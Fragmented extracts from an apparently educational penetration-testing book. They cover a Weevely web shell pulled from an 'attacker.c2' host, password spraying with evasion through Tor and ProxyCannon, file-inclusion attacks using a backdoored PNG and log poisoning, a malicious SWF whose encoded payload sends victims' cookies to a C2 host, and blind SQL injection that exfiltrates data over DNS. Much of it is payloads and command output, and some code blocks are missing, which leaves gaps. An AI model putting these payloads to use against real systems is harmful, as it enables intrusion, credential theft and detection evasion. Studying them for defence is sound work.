http://attacker.c2/shell.php
c:\\xampp\\htdocs\\xampp\\test.php"
BITSADMIN version 3.0 [ 7.5.7601 ]
BITS administration utility.
(C) Copyright 2000-2006 Microsoft Corp.
BITSAdmin is deprecated and is not guaranteed to
be available in future versions of Windows.
Administrative tools for the BITS service are now
provided by BITS PowerShell cmdlets.
Transfer complete.
root@kali:/var/www/html#
Note
As the bitsadmin output clearly states, the binary is deprecated.
While it is still available in all Windows versions to date, this may
not be the case going forward. However, enterprises are
somewhat slow to adopt new versions of Windows, so you can
probably rely on this tool for several years to come.
The Weevely client should now be able to connect to the test.php
shell on the remote host. The syntax to do this is self-explanatory:
root@kali:/var/www/html# weevely
http://api.ecorp.local/xampp/test.php
ECorpAppTest11251
[+] weevely 3.2.0
[+] Target: ECORP-PRD-
API01:C:\xampp\htdocs\xampp
[+] Session:
/root/.weevely/sessions/api.ecorp.local/test_0.ses
sion
[+] Shell: System shell
[+] Browse the filesystem or execute commands
starts the connection
[+] to the target. Type :help for more
information.
weevely>
weevely> whoami
ECORP-PRD-API01\Administrator
ECORP-PRD-API01:C:\xampp\htdocs\xampp $
The first step after getting the Weevely shell would be to remove the
system passthrough web shell xampp.php artifact, created earlier as
follows:
ECORP-PRD-API01:C:\xampp\htdocs\xampp $ del
xampp.php
At this point, we are free to move around the server and gather any
information that could be used in later stages of an attack. We have
full control of the server, and can run even better reverse shells,
such as Meterpreter, if needed.
In the same way that we queried the MySQL variables to find out
where the application resides on disk, an attacker could use the
phpinfo() output to improve the success of a local file inclusion
attack, as follows:
ECORP-PRD-API01:C:\xampp\htdocs\xampp $ del
test.php phpinfo.php
ECORP-PRD-API01:C:\xampp\htdocs\xampp $ dir
[-][channel] The remote backdoor request triggers
an error 404, please verify its availability
[-][channel] The remote backdoor request triggers
an error 404, please verify its availability
ECORP-PRD-API01:C:\xampp\htdocs\xampp $
Note
It is a good idea to finalize the report before destroying any
persistence into the network.
Resources
Consult the following resources for more information on penetration
testing tools and techniques:
In our scenario, we did not tackle the application head on, spending
countless hours interacting with the API and looking for a way to
compromise it. Instead, we assumed that the bulk of the security-
hardening effort was spent on the application itself, and we banked
on the fact that, understandably, securing a server or development
environment, and keeping it secure, is a difficult task.
Password spraying
A common issue that comes up with brute-forcing for account
credentials is that the backend authentication system may simply
lockout the target account after too many invalid attempts are made
in a short period of time. Microsoft's Active Directory (AD) has
default policies set on all its users that do just that. The typical policy
is stringent enough that it would make attacking a single account
with a large password list very time-consuming for most attackers,
with little hope for a return on investment. Applications that integrate
authentication with AD will be subject to these policies and traditional
brute-force attacks may cause account lockouts, potentially firing
alerts on the defender side, and certainly raising some red flags with
the locked-out user.
/**
* slapit.js
*
* @requires jQuery, Slappy
*
* @updated klibby@corp on 12/12/2015
*/
(function(){
var obj = $('.target');
/* @todo dmurphy@corp: migrate to Slappy2
library */
var slap = new Slappy(obj, {
slide: false,
speed: 300
});
slap.swipe();
)();
The preceding code not only gives us at least two accounts to target
in our spray, but also hints at how user account names are
structured. If we look through the contact information on the Meet
the Executive Team page, we can make educated guesses as to
what these employees' account names could be.
FirstName.LastName
[First Initial]LastName
LastName[First Initial]
FirstNameLastName
Any contact emails listed on the public site we can add to our list of
potential users to target for a spraying attack. Chances are good that
these also correspond to their login credentials. If, for example, we
farm a ton of company emails in the [email protected]
format and we know nothing else, we could build a user list
containing the following entries:
david.lightman
dlightman
lightmand
davidl
davidlightman
dlightma
dlightm2
dlightm3
Modifiers and their parameters are separated by a colon (:) and can
also be prefixed with a minus (-) sign to indicate whether the value
should be included or excluded from the results. The inurl modifier
can instruct Google to return only search results that contain a
particular string in the URL that was indexed. Conversely, the -inurl
modifier will exclude results that contain the specific string in their
URL. We can also wrap search terms in quotations to indicate that
we want results that match the exact string.
First, we will need to open the linkedin.txt file in read mode (r) and
store a pointer to it in the fp variable, as shown:
We can use a for loop to iterate the contents of fp using the iter
function. This will allow us to iterate over each line in the text file,
storing the respective value in the name variable for every loop:
Next, for each line, presumably containing a space delimited first and
last name entry, we can split() the two by a whitespace (' ') using
the following one-liner:
The variables first and last will contain the values you'd expect, in
lowercase and cleaned up of any extra spaces after chaining strip()
and lower() function calls.
Finally, we will also print a combination of the first initial and last
name, as well as less than the maximum eight-character versions of
each employee name:
fl = first[0] + last
lf = last + first[0]
print fl # dlightman
print lf # lightmand
fl = first[0] + last
lf = last + first[0]
print fl # dlightman
print lf # lightmand
All that's left to do is run the script and observe the output, as the
following figure shows:
Figure 4.2: Running the account name generator
Metadata
It's also possible to gather valid usernames by analyzing our list of
users, by looking at what is already available on the internet. Publicly
indexed documents are a good source for user IDs, as they often
contain valuable metadata information, either in the contents or
somewhere in the file header. When documents are created by
company employees, Microsoft Office and Adobe PDF, among many
other types of document-authoring software, by default will save the
name of the currently logged-on user as the file author in the
metadata. These documents don't have to be top secret; they can be
flyers and marketing material. It could be public data meant to be
shared with the world and we can make use of the automatically
populated metadata for our password spraying attacks.
With FOCA, we can quickly launch a search for all publicly available
documents for our target and one-click analyze their metadata.
Note
FOCA is available from ElevenPaths on
https://www.elevenpaths.com/labstools/foca/index.html or on
GitHub at https://github.com/ElevenPaths/FOCA.
When users forget their passwords, they call in tech support and
request a password reset. Usually, instead of an elaborate reset
procedure, support will reset the password to something simple to
read over the phone, so the employee can login and resume working
quickly. A common password scheme is [Current Season][Current
Year]. Something like Fall2017 is easy to communicate over the
phone and will satisfy most password complexity policies. At times, a
special character may be sprinkled in there as well: Fall@2017 or
Fall2017!.
This isn't really an issue if the user logs in and resets their password
immediately. AD has an option for tech support that requires the user
to change their password after the first successful login.
Unfortunately, legacy systems and complex authentication schemes
do not always support password reset on first login, forcing
organizations to require users to do this manually. While the majority
of users will reset their password immediately, some won't and we
usually only need just one user to slip up.
Fall2017
Fall17
Fall2017!
Fall@2017
Summer2017
Summer17
Summer2017!
Summer@2017
Spring2017
Spring17
Spring2017!
Spring@2017
The request we will send will be a POST to the /login page. We can
specify the request body and payload positions under the Intruder
Positions tab. Highlighting the dummy values for username and
password, we can click the Add button on the right side to denote a
payload position, as shown in the following screenshot:
Figure 4.5: Defining the payload positions
Our second payload set will be the passwords to be tested for each
username. Once again, this is not where we'd load rockyou.txt and
let it rip. In a password spraying attack, we target a large list of
known-good user IDs, with only a few very common passwords. We
want to avoid locking out and triggering alerts.
After loading our target users list and specifying a few passwords,
we can spray the application by clicking Start attack. The following
figure shows the Intruder attack window and all of the requests made
during the password spraying attack:
Torify
The Tor Project was started to provide a way for users to browse
the internet anonymously. It is by far the best way to anonymize
traffic and best of all, it's free. Tor is a network of independently
operated nodes interconnected to form a network through which
packets can be routed.
The following graphic shows how a user, Alice, can connect to Bob
through a randomly generated path or circuit, through the Tor
network:
Figure 4.9: The Tor network traffic flow (source: https://www.torproject.org/)
Note
More information on Tor can be found on the official site:
https://www.torproject.org.
While Tor is important for anonymity, we're not really concerned with
staying completely anonymous. We can, however, leverage the
randomly chosen exit nodes to mask our public IP when attacking an
application.
Tor packages are available on most Linux distributions. On Kali, it
can be installed using the package manager. The apt-get command
shown in the following code will install Tor, as well as a useful
application called torsocks:
Torsocks is a nice tool that can "torify" applications and even provide
an interactive shell that automatically routes all traffic through an
active Tor tunnel. This will allow us to force applications that don't
natively support routing through Tor to use the anonymous network.
Note
Torsocks can be found on the Tor Project Git repository:
https://gitweb.torproject.org/torsocks.git.
root@kali:~# tor
[notice] Tor 0.3.1.9
[notice] Read configuration file "/etc/tor/torrc".
[notice] Opening Socks listener on 127.0.0.1:9050
[notice] Parsing GEOIP IPv4 file
/usr/share/tor/geoip.
[notice] Parsing GEOIP IPv6 file
/usr/share/tor/geoip6.
[warn] You are running Tor as root. You don't need
to, and you probably shouldn't.
[notice] Bootstrapped 0%: Starting
[notice] Starting with guard context "default"
[notice] Bootstrapped 80%: Connecting to the Tor
network
[notice] Bootstrapped 85%: Finishing handshake
with first hop
[notice] Bootstrapped 90%: Establishing a Tor
circuit
[notice] Tor has successfully opened a circuit.
Looks like client functionality is working.
[notice] Bootstrapped 100%: Done
Once the Tor client has initialized and a tunnel (circuit) has been
selected, a SOCKS proxy server is launched on the localhost,
listening on port 9050. To force our attack traffic through the Tor
network and mask our external IP, we can configure Burp Suite to
use the newly spawned proxy for all outgoing connections. Any other
programs that do not support SOCKS can be "torified" using either
ProxyChains or the previously installed torsocks utility.
Note
ProxyChains is available on all penetration testing distros and on
http://proxychains.sourceforge.net/.
In Burp Suite, under the Project options tab, we can select the
Override user options check to enable the SOCKS configuration
fields. The values for SOCKS proxy and port will be localhost and
9050 respectively, and it's a good idea to make DNS lookups through
the proxy as well.
Figure 4.10: Configuring the upstream SOCKS proxy in Burp
While the Tor client does refresh the circuit periodically, it may not be
quick enough for a brute-force attack, where rotating IPs is needed
for evasion. We don't want to throttle our connection so much that
the scan does not finish before the engagement is over.
The Tor proxy can be forced to update the current circuit with a
process hang up signal (SIGHUP). Using the killall or kill Linux
commands, we can issue a HUP signal to the Tor application and
force the process to rotate our exit node.
First, we can drop into a torsocks shell to hook all curl requests and
forward them through the Tor network. The torsocks command can
be called using the --shell parameter, as shown:
Each request to the IP service returned a new Tor exit node. We can
also crudely automate sending the HUP signal using the watch
command in a separate terminal. The -n option specifies how often
to execute the killall command. In this case, Tor will be issued a
SIGHUP every 10 seconds, effectively rotating our external IP at the
same time:
The following figure shows the watch command running the killall
command on the Tor application every 10 seconds, while Burp's
Intruder module performs a password guessing attack:
Figure 4.12: Running a password guessing attack with a constantly changing exit IP
The low and slow nature of the attack, coupled with an ever-
changing source IP, makes it more difficult for defenders to
differentiate our attack traffic from legitimate traffic. It's not
impossible to design effective rules that find brute-force attacks
coming from many IPs in many regions, but it is fairly difficult to do
without generating false positives.
There are a couple of issues with conducting attacks through the Tor
network. The routing protocol is inherently slower than a more direct
connection. This is because Tor adds several layers of encryption to
each transmission, and each transmission is forwarded through
three Tor nodes on top of the normal routing that internet
communication requires. This process improves anonymity but also
increases communication delay significantly. The lag is noticeable for
normal web browsing, but this is a tolerable trade-off. For large
volume scans, it may not be the ideal transport.
Note
It should also be noted that Tor is used heavily in regions of the
world where privacy is of utmost importance. Conducting large
volume attacks through Tor is discouraged, as it can lead to
unnecessary network slowdowns and can impact legitimate
users. Low and slow attacks shouldn't cause any problems.
Some red-team engagements may even require testing from the
Tor network to verify related IDS/IPS rules are working as
intended, but caution should be taken when launching attacks
through a limited-resource public medium.
The other problem with Tor is that the exit nodes are public.
Firewalls, IDS, IPS, and even host-based controls can be configured
to outright block any connection from known Tor nodes. While there
are legitimate users on Tor, it also has a long history of being used
for illegal activity; the risk of annoying a small number of potential
customers by disallowing Tor connections is generally acceptable by
organizations.
Note
A list of active Tor exit nodes can be found here:
https://check.torproject.org/cgi-bin/TorBulkExitList.py.
Proxy cannon
An alternative to using Tor for diversifying our attack IPs is to simply
use the cloud. There are countless Infrastructure as a Service
(IaaS) providers, each with a large IP space available for free to VM
instances. VMs are cheap and sometimes free as well, so routing
our traffic through them should be fairly cost effective.
Cue ProxyCannon, a great tool that does all the heavy lifting of
talking to Amazon's AWS API, creating and destroying VM
instances, rotating external IPs, and routing our traffic through them.
Note
ProxyCannon was developed by Shellntel and is available on
GitHub:
https://github.com/Shellntel/scripts/blob/master/proxyCannon.py.
The ProxyCannon tool should now be ready to use with the -h option
showing all of the available options:
The access key ID and the secret keys are randomly generated and
should be stored securely. Once the engagement is over, you should
delete the keys in the AWS console.
As you can see, these are stored in plaintext, so make sure this file
is properly protected. Amazon recommends that these keys are
rotated frequently. It's probably a good idea to create new ones for
each engagement and delete them from AWS as soon as they're not
required anymore.
++++++++++++++++++++++++++++++++++++++++++++++++++
+++++++++++++++++
+ Leave this terminal open and start another to
run your commands.+
++++++++++++++++++++++++++++++++++++++++++++++++++
+++++++++++++++++
On the AWS console, we can see the started t2.nano instances and
their public IPs:
RFI
LFI
File upload abuse
Chaining vulnerabilities to achieve code execution
If you have spent any amount of time working in the enterprise world,
you can no doubt attest to how frequent these issues can be.
Custom in-house applications are often built with deadlines in mind,
not security. Enterprise web applications are not the only problem:
the Internet of things (IoT) nightmare is just starting to take hold.
The majority of affordable devices, such as Wi-Fi routers or internet-
connected plush toys, are designed poorly and once released, are
never updated. Due to many constraints, both financial and in terms
of hardware limitations, device security is rudimentary, if at all
present. IoT devices are the new PHP applications of the 2000s and
vulnerabilities we thought were gone are coming back with a
vengeance.
Note
DVWA can be downloaded in various formats, including an easy
to run live CD, from http://www.dvwa.co.uk/.
RFI
Although not as common in modern applications, RFI vulnerabilities
do still pop up from time to time. RFI was popular back in the early
days of the web and PHP. PHP was notorious for allowing
developers to implement features that were inherently dangerous.
The include() and require() functions essentially allowed code to
be included from other files, either on the same disk or over the wire.
This makes web applications more powerful and dynamic but comes
at a great cost. As you can imagine, allowing user data to pass to
include() unsanitized can result in application or server
compromise.
http://dvwa.app.internal/vulnerabilities/fi/
http://dvwa.app.internal/vulnerabilities/fi/?
page=about.php
http://dvwa.app.internal/vulnerabilities/fi/?
page=http://c2.spider.ml/test.txt
Figure 5.1: The application includes the remotely hosted PHP code, executes it, and returns
the contents of /etc/passwd
The DVWA can be used to showcase this type of attack. The high
difficulty setting disallows the uploading of anything but JPEG or
PNG files, so we can't just access the uploaded shell directly and
execute the code.
To get around this issue, we can generate a fake PNG file using
ImageMagick's convert command. We will create a small 32×32
pixel image, with a pink background, and save it as shell.png using
the following switches:
The file data structure is relatively simple. The PNG header and a
few bytes describing the content are automatically generated by the
convert command. We can inspect these bytes using the hexdump
command. The -C parameter will make the output a bit more
readable:
Just as before, the if statement will check that the MD5 hash value
of the incoming password parameter matches
f1aab5cd9690adfa2dde9796b4c5d00d. If there's a match, the command
string in the cmd GET parameter will be passed to the PHP system()
function, which will execute it as a system command, giving us shell
access.
The MD5 value we're looking for is the hash of DVWAAppLFI1, as
confirmed by the md5sum Linux command:
We can use the echo shell command to append (>>) the PHP code to
our shell.png image:
We've seen this passthrough shell before and it should do the trick
for now. We can replace it with a more advanced shell if needed, but
for our proof of concept, this should suffice.
For all intents and purposes, this is still a valid PNG image. Most
rendering software should have no problem displaying the contents,
a small pink box, as shown:
Figure 5.4: The backdoored PNG file successfully uploaded to the target application
DVWA is nice enough to tell us where the application stored our file.
In real-world scenarios, we may not be so lucky. We'd have to rely
on information leaks for the absolute path if the vulnerability required
it. If we can use relative paths in the file inclusion attack, we can try
and find the file on disk by systematically moving through the
filesystem (../, ../../, ../../../ and so on).
To make use of our PNG shell, we will use the DVWA file inclusion
vulnerability at http://dvwa.app.internal/vulnerabilities/fi/. The
LFI issue is present in the page parameter via a GET request. The
application allows inclusion of a few files on disk, presumably to be
more modular and easier to manage.
The if statement will only allow files to be included if they begin with
the word file, such as file01.php, or file02.php. The include.php
file is also allowed to be included. Anything else, such as
http://c2.spider.ml/test.txt, for example, will produce an ERROR:
File not found! message.
At first glance, this is a fairly stringent control, but there are some
issues. This particular control implementation illustrates an important
issue with application development and security. In an effort to
prevent inclusion attacks, the developers went with the whitelist
approach, but due to time constraints and high maintenance costs,
they decided to use string matching instead of an explicit list of files.
Ideally, user input should never be passed to the include (or similar)
function at all. Hard-coding values is more secure, but the code is
harder to manage. There is always a tradeoff between security and
usability, and as attackers, we bank on management going with the
more cost effective and typically more insecure option.
We could name our PNG shell file.png, but since our uploaded file
will reside outside of the vulnerable script's directory, the string we'd
have to pass in would need to be an absolute (or relative) path,
which would fail to trigger the if condition shown in the preceding
screenshot and the exploit would fail. Once again, PHP's versatility
and developer-friendliness comes to the rescue. PHP allows
developers to reference files on disk by relative path
(../../../etc/passwd), by absolute path (/etc/passwd), or using the
built-in URL scheme file://.
http://dvwa.app.internal/vulnerabilities/fi/?
page=file:///var/www/html/hackable/uploads/shell.p
ng
The Burp Repeater module can help us to trigger and inspect the
results of exploiting this vulnerability, as shown in the following
figure:
Figure 5.6: Successfully including the backdoored PNG using LFI
This looks good. In the left column is a raw HTTP GET request to the
vulnerable page using the file:// scheme and the absolute path to
our shell.png for the page parameter. In the right column, the server
response appears to indicate that the file was included and the PHP
source code we appended to it is not displayed, meaning it either
executed or it was stripped out by a compression or cropping
function. The latter would be unfortunate, but we can quickly see
whether code execution is successful by trying to trigger the shell
through the URL.
The uploaded shell will execute command strings passed via the GET
parameter cmd and we can append the whoami operating system
command to our previous payload, and observe the Burp Repeater
module's output. We must also provide the expected password via
the password parameter, as show in the following figure:
Figure 5.7: The backdoored PNG successfully executes the shell command after LFI
Success! We now have code execution on the system by taking
advantage of two vulnerabilities: poor controls in file upload and LFI.
The Repeater Request column highlights the command whoami,
being passed to the vulnerable application and the server response
confirms that we have achieved our goal of displaying the user www-
data as the context of the application.
Not unlike the file:// payload looking for the uploaded shell, we
can reference another file on the system whose contents we control
to an extent. Apache web servers, by default, generate an
access.log file somewhere on the disk. This file contains every
request sent to the application, including the URL. Experience of
some Google-fu tells us that this file is usually in /var/log/apache2 or
/var/log/httpd.
We can pass in our shell using a simple HTTP GET request to the
application:
Figure 5.8: Sending our PHP shell code to the application server log through a GET request
All that's left to do is use LFI and have PHP execute whatever code
is in the log file. As before, we have to provide the correct password
via the GET request. Our URL payload will contain the file://
scheme and the absolute path to the Apache access.log file,
/var/log/apache2/access.log, our shell password, and the command
to view the contents of the /etc/passwd file. Since this command is
sent via a GET request parameter, we have to convert the space
between cat and /etc/passwd with a plus sign, as shown:
Figure 5.9: Remote code execution via LFI and poisoned Apache log files
The server response confirms that the shell command cat was
executed successfully. Somewhere inside all of the response noise,
we can find the contents of /etc/passwd. There are some obvious
stealth issues with this approach. If log files are scrutinized by the
defenders, this would stand out like a sore thumb.
This method may be crude, but it does showcase the extent of the
damage a simple file inclusion vulnerability can cause.
File inclusion to remote code
execution
Similar to the file:// scheme used in the earlier example, the PHP
interpreter also provides access to various input and output streams
via the php:// scheme. This makes sense for when PHP is used in a
command-line interface (CLI) and the developer needs to access
these common operating system standard streams: stdin, stderr,
stdout, and even the memory. Standard streams are used by
applications to communicate with the environment they are
executing in. For example, the Linux passwd will utilize the stdout
stream to display informational messages to the terminal ("Enter
your existing password"), stderr to display error messages ("Invalid
password"), and stdin to prompt for user input to change the existing
password.
Note
A superglobal is a variable that is always set by the PHP
interpreter and is accessible throughout the application. $_GET
and $_POST are the most popular, but there are others, including
$_SESSION, $_ENV, and $_SERVER. More information can be found in
the PHP manual:
http://php.net/manual/en/language.variables.superglobals.php.
The GET request shown in the preceding screenshot, in the left page,
uses the php://input as the page parameter, instructing PHP to
include code coming in from user input. In a web application setting,
input data comes from the body of the request. In this case, the body
contains a simple PHP script that executes the command cat
/etc/passwd on the system. The response reflects the output of
/etc/passwd, confirming that remote code execution was successful.
There are other problems with allowing users to upload arbitrary files
to the application. You could very well prevent users from uploading
PHP, JSP, or ASP shells by simply blacklisting the extension. PHP
only executes code in files with a particular extension (or two) if they
are called directly. Barring any LFI vulnerability somewhere else in
the application, the file upload feature should be fairly safe from a
code execution perspective.
package
{
import flash.display.Sprite;
import flash.external.*;
import flash.system.System;
public class XSSProject extends Sprite
{
public function XSSProject()
{
flash.system.Security.allowDomain("*");
ExternalInterface.marshallExceptions = true;
try {
ExternalInterface.call("0);}catch(e)
{};"+root.loaderInfo.parameters.js+"//");
} catch(e:Error) {
trace(e);
}
}
}
}
Let's go ahead and upload the XSSProject SWF malicious file using
the application's file upload feature. You may need to change the
DVWA difficulty to low, to allow non-image file upload. The following
figure shows that the XSSProject malware was uploaded
successfully in the familiar directory:
http://dvwa.app.internal/hackable/uploads/xssproje
ct.swf?js=[javascript code]
To test the POC, we can call the following URL and observe the
browser behavior:
http://dvwa.app.internal/hackable/uploads/xssproje
ct.swf?js=alert(document.cookie);
We can use this URL to perform XSS attacks against users of the
vulnerable application. Instead of popping up a window to prove the
vulnerability exists, we could inject more useful JavaScript code,
such as a Browser Exploitation Framework (BeEF) hook. We will
discuss this tool in Chapter 9, Practical Client-Side Attacks.
The following figure shows that the JavaScript code was injected
successfully by the malware (xssproject.swf):
Figure 5.12: XSS attack after abusing file upload functionality
This payload will write new HTML code to the Document Object
Model (DOM) using the document object. The HTML code is a hidden
iframe element, which makes an HTTP request to our command and
control infrastructure. The HTTP request will contain the victim's
cookies, Base64-encoded right in the request URL, allowing us to
capture this data remotely. The last function to redirect the client to
the main page '/' will trigger after 500 milliseconds. This is to
ensure the iframe has a chance to load and exfiltrate our data.
Figure 5.13: URL encoding the JavaScript payload using Burp's Decoder module
http://dvwa.app.internal/hackable/uploads/xssproje
ct.swf?
js=%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%2
2%4c%6f%61%64%69%6e%67%2e%2e%2e%3c%69%66%72%61%6d%
65%20%73%74%79%6c%65%3d%27%64%69%73%70%6c%61%79%3a
%6e%6f%6e%65%3b%27%20%73%72%63%3d%27%2f%2f%63%32%2
e%73%70%69%64%65%72%2e%6d%6c%2f%22%2b%62%74%6f%61%
28%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%29
%2b%22%27%3e%3c%2f%69%66%72%61%6d%65%3e%22%29%3b%7
3%65%74%54%69%6d%65%6f%75%74%28%66%75%6e%63%74%69%
6f%6e%28%29%7b%77%69%6e%64%6f%77%2e%6c%6f%63%61%74
%69%6f%6e%2e%68%72%65%66%3d%27%2f%27%3b%7d%2c%35%3
0%30%29%3b
root@spider-c2-1:~# nc -lvp 80
listening on [any] 80 ...
connect to [10.0.0.4] from 11.25.198.51 59197
With the server ready for incoming connections from our victim, we
can start our attack and wait for the user to click on our malicious
URL:
GET
/UEhQU0VTU0lEPXBhdGxrbms4bm5ndGgzcmFpNjJrYXYyc283O
yBzZWN1cml0eT1oaWdo
HTTP/1.1
Host: c2.spider.ml
Connection: keep-alive
Upgrade-Insecure-Requests: 1
[...]
root@spider-c2-1:~# echo
"UEhQU0VTU0lEPXBhdGxrbms4bm5ndGgzcmFpNjJrYXYyc283O
yBzZWN1cml0eT1oaWdo" | base64 -d
PHPSESSID=patlknk8nngth3rai62kav2so7; security=low
Creating a C2 server
Using INetSim to emulate services
Confirming vulnerabilities using out-of-band techniques
Advanced data exfiltration
A common scenario
Imagine that the application http://vuln.app.internal/user.aspx?
name=Dade is vulnerable to a SQL injection attack on the name
parameter. Traditional payloads and polyglots do not seem to affect
the application's response. Perhaps database error messages are
disabled and the name value is not processed synchronously by the
application.
A simple single-quote value for name would produce a SQL error and
we'd be in business, but in this case, the error messages are
suppressed, so from a client perspective, we'd have no idea
something went wrong. Taking it a step further, we can force the
application to delay the response by a significant amount of time
to confirm the vulnerability:
This payload injects a 20 second delay into the query return, which is
noticeable enough that it would raise some flags, but the query is
executed asynchronously. That is, the application responds to us
before the query has completed because it probably doesn't depend
on the result.
';declare @q varchar(99);set
@q='\\attacker.c2\test'; exec
master.dbo.xp_dirtree @q;--
Google Cloud
Amazon AWS
Microsoft Azure
DigitalOcean
Google Cloud and Amazon AWS have tiers that provide you with all
the VM resources you need for free; for a limited time, of course.
However, the few dollars a month it costs to run VMs in the cloud is
well worth it for those of us who rely on C2 infrastructure.
Note
These C2 instances should also be a per-client deployment and
the disks should be encrypted. Due to the nature of our work,
sensitive customer data may flow in and could be stored
insecurely. Once an engagement is complete, destroy the
instance, along with any client data it may have collected.
Figure 6.2: The zone configuration and the delegation of c2.spider.ml to our C2 instance's
IP
Note
Let’s Encrypt provides free domain-validated certificates for
hostnames and even wildcard certificates. More information can
be found on https://letsencrypt.org/.
root@spider-c2-1:~# wget
https://dl.eff.org/certbot-auto
[...]
root@spider-c2-1:~# chmod +x certbot-auto
Certbot does have the option to automatically update web server
configuration but for our purposes, we will do a manual request. This
will drop the new certificate somewhere on disk and we can use it as
we please.
dGhlIG9ubHkgd2lubmluZyBtb3ZlIGlzIG5vdCB0byBwbGF5
Before continuing, verify the record is deployed.
--------------------------------------------------
-------------------
Press Enter to Continue
The wizard may prompt you again to update the TXT value to
something new, in which case you may have to wait a few minutes
before continuing. A low TTL value such as 5 minutes or less will
help with the wait.
If everything is in order and Let’s Encrypt was able to verify the TXT
records, a new certificate will be issues and stored on disk
somewhere in /etc/letsencrypt/live/:
IMPORTANT NOTES:
- Congratulations! Your certificate and chain
have been saved at:
/etc/letsencrypt/live/spider.ml/fullchain.pem
Your key file has been saved at:
/etc/letsencrypt/live/spider.ml/privkey.pem
[...]
root@spider-c2-1:~#
These certificates are only valid for a few months at a time, as per
Let’s Encrypt policy. You will have to renew these using a similar
process as the initial request. Certbot keeps a record of requested
certificates and their expiry dates. Issuing a renew command will
iterate through our certificates and automatically renew them.
INetSIM looks for these files in the certs directory which is typically
located under /usr/share/inetsim/data/.
We can now enable the simulated HTTPS service and test the
certificate validity:
Note
INetSim binaries, source, and documentation is available on
http://www.inetsim.org/.
root@spider-c2-1:~# wget -O -
https://www.inetsim.org/inetsim-archive-signing-
key.asc | apt-key add -
[...]
(464 MB/s) - written to stdout [2722/2722]
OK
root@spider-c2-1:~#
The next step is to grab the inetsim package from the newly
installed apt repository and install it.
The INetSim default configuration may be a bit too much for our
purposes. Services such as FTP, which allow arbitrary credentials
and provide upload support, should not be enabled on the internet.
Note
INetSim is a great tool, but use with care. If the C2 server you
are building is intended for a long-term engagement, it is better to
use a proper daemon for each service you are intercepting.
The following echo command will replace the contents of the sample
HTTP files with benign JavaScript code:
This is the path our DNS query takes through the internet:
Since we control this DNS server responsible for the c2 zone, we can
inspect /var/log/inetsim/service.log and observe the response
sent to the dig request, using the tail command as shown:
root@spider-c2-1:~# tail
/var/log/inetsim/service.log
[...] [11033] [dns_53_tcp_udp 11035] connect
[...] [11033] [dns_53_tcp_udp 11035] recv: Query
Type A, Class IN, Name
c2FudGEgY2xhdXNlIGlzIG5vdCByZWFs.c2.spider.ml
[...] [11033] [dns_53_tcp_udp 11035] send:
c2FudGEgY2xhdXNlIGlzIG5vdCByZWFs.c2.spider.ml 3600
IN A 35.196.100.89
[...] [11033] [dns_53_tcp_udp 11035] disconnect
[...] [11033] [dns_53_tcp_udp 11035] stat: 1
qtype=A qclass=IN
qname=c2FudGEgY2xhdXNlIGlzIG5vdCByZWFs.c2.spider.m
l
root@spider-c2-1:~#
The WAITFOR DELAY payload will work for most blind SQL injections,
as the majority of application views depend on the result from SQL
queries that the controller executes.
When the backend system builds the query for execution, it will
translate into the following:
SELECT * FROM users WHERE user = 'Dade';declare @q
varchar(99);set @q='\\sqli-test-payload-
1.c2.spider.ml\test'; exec master.dbo.xp_dirtree
@q;--';
Let's go ahead and revisit the method we've used to confirm the
vulnerability in the first place. We've passed in a query that forced
the SQL server to resolve an arbitrary domain name in an attempt to
list the contents of a network share over SMB. Since we control the
DNS server that has authority over the share domain, we can
intercept any query sent to it. Confirmation was just a matter of
observing the application server attempting to resolve the domain for
the network share we passed in. To actually get the data out, we'll
have to build a query that performs these actions:
declare @q varchar(99);
Next, we will use a couple of SELECT statements to read the user field
for the first account with the admin role:
We will also select the password field for this particular user:
exec('xp_fileexist
''\\'+@q+'.c2.spider.ml\test''');--'
The confusing double and single quotes preceding the double
backslash is just the Windows way to escape the single quote.
The final payload is a bit messy but should do the trick. We will
combine all of our statements into one line, with each statement
separated by a semicolon:
On the backend, the SQL query to be executed will look like the
following:
Figure 6.7: A quick search on Hashtoolkit.com for the retrieved password hash with the
value "summer17" popping up in the results
Note
Hash Toolkit lets you run searches for MD5 and SHA-* hashes to
quickly return their plaintext counterparts. The most common
passwords have already been cracked or computed by
somebody somewhere and sites like Hash Toolkit provide a quick
index for the results. As with anything on the internet, be aware
of what data you submit to an untrusted medium. Hash Toolkit is
available on https://hashtoolkit.com/.
Data inference
Let's consider a simpler scenario where the application does not
process the payload asynchronously. This is a far more common
scenario. Typically, in a blind injection scenario we can use
conditional statements in the injected query to infer data from the
database. If the preceding example vulnerability was not
asynchronous, we could introduce a significant delay in the
response. Combine that with a traditional if-then-else and we can
make assumptions about the data we are trying to retrieve.
The high-level pseudocode we'd use for this type of attack looks like
this:
[...]
We could repeatedly check for the contents of the password field for a
particular user, simply by observing the server response time. In the
preceding pseudocode, after the first three iterations, we'd be able to
infer that the password value begins with ab.
BENCHMARK(5000000,MD5(CHAR(99)))
If the number of iterations is too low, the server would return a result
quickly, making it harder to determine if the injection was successful.
We also don't want to introduce too much of a delay, as enumerating
a database could take days.
The final attack payload will combine the IF statement and the
benchmark operation. We will also use the UNION keyword to
combine the existing SELECT with our very own:
The backend SQL query to be executed will, once again, look like
the following:
The key takeaway here is the ability to alter the application behavior
in a way that is measurable by the attacker. Even some of the more
secure application development environments, which aggressively
filter outgoing traffic, tend to allow at least DNS UDP packets to fly
through. Filtering egress DNS queries is a difficult exercise and I
